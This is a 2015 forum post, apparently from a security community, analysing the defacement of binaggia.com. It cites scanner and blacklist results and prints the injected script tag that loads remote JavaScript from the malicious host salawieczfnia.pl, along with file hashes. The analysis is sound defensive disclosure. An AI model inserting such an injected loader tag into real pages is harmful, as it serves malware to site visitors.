Defaced with code with a row of non-breaking spaces like <p>  & etc.

polonus · September 18, 2015, 8:33pm

See: http://killmalware.com/binaggia.com/#
List of scripts included:
going to:

<script type="text/javascript" src="htxp://salawieczfnia.pl/pkrqvhtg.php?id=144142"></script>

specific uri could not be fetched → http://www.domxssscanner.com/scan?url=http%3A%2F%2Fsalawieczfnia.pl
Detected: https://www.virustotal.com/nl/url/a2edad3855c35ab7d6336e4f5cd856f66cddd2a89ff55fab4d2f926f9ed2697a/analysis/
See defacement detected: https://sitecheck.sucuri.net/results/binaggia.com
Blacklisted: https://www.yandex.com/infected?url=binaggia.com&l10n=en&redircnt=1442607711.1
Version from 2011 - http://salawieczfnia.pl/wp-content/themes/karolina/js/jquery.cycle.all.js (left code?) -read: https://www.drupal.org/node/1212484 and vulnerable REST URL parameter 5: http://xss.cx/2011/04/23/dork/blind-sql-injection-os-command-execution-ligattsecuritycom.html uMatrix has prevented the following page from loading:
-http://adstat.4u.pl/s.js?salawieczfnia

index.html
Severity: Malicious
Reason: Detected encoded JavaScript code commonly used to hide malicious behaviour.
Details: Malicious obfuscated JavaScript threat
Offset: 985
Threat dump: View code

<!--f1337c--><script type="text/javascript" src="-http://salawieczfnia.pl/pkrqvhtg.php?id=144142"></script><!--/f1337c-->

Threat dump MD5: 5A667E7DF37A62237A35567BC63DEC80
File size[byte]: 1316
File type: HTML
Page/File MD5: F8130C306054B9A6514C17D57FA92685
Scan duration[sec]: 0.003000

polonus

Defaced with code with a row of non-breaking spaces like <p>&nbsp;&nbsp;& etc.

Announcements

Defaced with code with a row of non-breaking spaces like <p> & etc.